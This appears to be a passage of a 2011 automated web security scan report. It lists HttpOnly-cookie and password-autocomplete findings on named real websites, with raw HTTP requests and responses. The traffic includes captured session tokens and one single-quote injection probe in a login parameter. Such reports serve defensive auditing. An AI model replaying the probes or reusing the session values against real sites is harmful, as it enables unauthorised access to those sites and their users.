<h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2f_xpress%2fxpqServiceListPW.aspx">here</a>.</h2>
</body></htm
...[SNIP]...
18.175. http://www.porterwright.com/styleBuilder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /styleBuilder.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /styleBuilder.aspx?siteId=1111&langGuid=7483b893-e478-44a4-8fed-f49aa917d8cf&siteKey=xpress HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/contactus/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305202915.1305216543.2; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1161; PortletId=51101; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=7; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:42:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: ZoneId=0; path=/
Last-Modified: 5/12/2011 11:42:49 AM
Cache-Control: private
Content-Type: text/css; charset=utf-8
ntCoent-Length: 33
Content-Length: 33

body {background-color:#ffffff;}
18.176. http://www.wendel.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendel.com
Path:   /index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.cfm?fuseaction=firmGroups.firmGroupDetail&ID=3986 HTTP/1.1
Host: www.wendel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wendel.com/
Cookie: CFID=8682898; CFTOKEN=65393107; CFCLIENT_CRAZYFINGERS=personid%3D0%23; CFGLOBALS=urltoken%3DCFID%23%3D8682898%26CFTOKEN%23%3D65393107%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23hitcount%3D2%23cftoken%3D65393107%23cfid%3D8682898%23; LB-Persist=Q7x370Drr/ddufmTEf2ps0e/58OoyB2QIE0OYO6bXUVdnTI+2FWPFqdOsT2Q9bFgo8jfK6xV+tlz5g==; __utma=189412781.958504098.1305216149.1305216149.1305216149.1; __utmb=189412781.1.10.1305216149; __utmc=189412781; __utmz=189412781.1305216149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wendel%20Rosen

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:02:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D8682898%26CFTOKEN%23%3D65393107%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A55%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23hitcount%3D3%23cftoken%3D65393107%23cfid%3D8682898%23;expires=Sat, 04-May-2041 16:02:55 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Wendel
...[SNIP]...
18.177. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=3837 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
18.178. http://www.wi-ala.org/clubportal/loginretrieval.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/loginretrieval.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clubportal/loginretrieval.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination.&username=
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.9.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A37%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D10%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:37 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
18.179. http://www.wi-ala.org/clubportal/memLogin.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/memLogin.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination%2E&username=%27 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D11%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.7.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D12%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
18.180. http://www.wi-ala.org/clubportal/memLoginExe.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/memLoginExe.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /clubportal/memLoginExe.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D10%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.7.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators
Content-Type: multipart/form-data; boundary=---------------------------24346102528970
Content-Length: 500

-----------------------------24346102528970
Content-Disposition: form-data; name="cftokenvalue"

a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD
-----------------------------24346102528970
C
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 18:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D11%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:02 GMT;path=/
Pragma: no-cache
location: memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination%2E&username=%27
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8

18.181. http://www.wi-ala.org/clubportal/wala/Page.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/wala/Page.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clubportal/wala/Page.cfm?clubID=177&pubmenuoptID=1361 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D8%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.6.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D9%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:53 GMT;path=/
Content-Type: text/html; charset=UTF-8


               <html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>
Membership -
...[SNIP]...
19. Password field with autocomplete enabled  previous  next
There are 24 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

19.1. https://client.poynerspruill.com/Pages/Home.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /Pages/Home.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Pages/Home.aspx HTTP/1.1
Host: client.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx
Cookie: __utma=27281085.1533661144.1305216539.1305216539.1305218531.2; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill; __utmb=27281085.2.10.1305218531

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 41418
Content-Type: text/html; charset=utf-8
Expires: Wed, 27 Apr 2011 16:42:24 GMT
Last-Modified: Thu, 12 May 2011 16:42:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 16:42:24 GMT

<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HEAD><meta name="GENERATOR" content="Microsoft SharePoint" /><meta name="progid" content="SharePoint.WebPartPa
...[SNIP]...
<BODY scroll="yes" onload="javascript:if (typeof(_spBodyOnLoadWrapper) != 'undefined') _spBodyOnLoadWrapper();">
<form name="aspnetForm" method="post" action="Home.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$m$g_e2523162_23ec_41f4_951e_9cc14451b4e4$ctl00$Password" type="password" id="ctl00_m_g_e2523162_23ec_41f4_951e_9cc14451b4e4_ctl00_Password" /><span id="ctl00_m_g_e2523162_23ec_41f4_951e_9cc14451b4e4_ctl00_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...
19.2. https://client.poynerspruill.com/pages/changepassword.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /pages/changepassword.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/changepassword.aspx HTTP/1.1
Host: client.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://client.poynerspruill.com/Pages/Home.aspx
Cookie: __utma=27281085.1533661144.1305216539.1305216539.1305218531.2; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill; __utmb=27281085.2.10.1305218531

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 31123
Content-Type: text/html; charset=utf-8
Expires: Wed, 27 Apr 2011 16:43:19 GMT
Last-Modified: Thu, 12 May 2011 16:43:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 16:43:19 GMT

<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HEAD><meta name="GENERATOR" content="Microsoft SharePoint" /><meta name="progid" content="SharePoint.WebPartPa
...[SNIP]...
<BODY scroll="yes" onload="javascript:if (typeof(_spBodyOnLoadWrapper) != 'undefined') _spBodyOnLoadWrapper();">
<form name="aspnetForm" method="post" action="changepassword.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$m$g_a644741a_5f5c_49fe_af2d_cb6047e88a6a$ctl00$Password" type="password" id="ctl00_m_g_a644741a_5f5c_49fe_af2d_cb6047e88a6a_ctl00_Password" /><span id="ctl00_m_g_a644741a_5f5c_49fe_af2d_cb6047e88a6a_ctl00_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...
19.3. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boston.com
Path:   /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/ HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:06 GMT
Server: Apache/2.2.17 (Linux/SUSE) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Accept-Ranges: bytes
Served-By: nefertiti
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Content-Length: 37920

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Convention center gets $24m settlement - The Boston Globe</titl
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...
19.4. https://www.gartner.com/login/loginInitAction.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.gartner.com
Path:   /login/loginInitAction.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/loginInitAction.do?method=initialize HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231574822:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.2.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Set-Cookie: LoginWLSessionID=3bkJNMQQD2nxnqL2p2zQ93pRLjH08HWLknkhYc1dLHbJfTZfBQKK!421925354; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:19:45 GMT
ETag: "pv88e506d78098b5f6d97f17af119733a5"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.U73FCF567].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 4724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <me
...[SNIP]...
</h2>
                   
                   <form name="loginForm" method="post" action="/login/loginInitAction.do?method=processLogin">
                   
                       
                                               <label for="username">
...[SNIP]...
</label>
                       <input type="password" name="password" size="30" value="" class="gSignInInput02">
                       <div class="clear">
...[SNIP]...
19.5. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
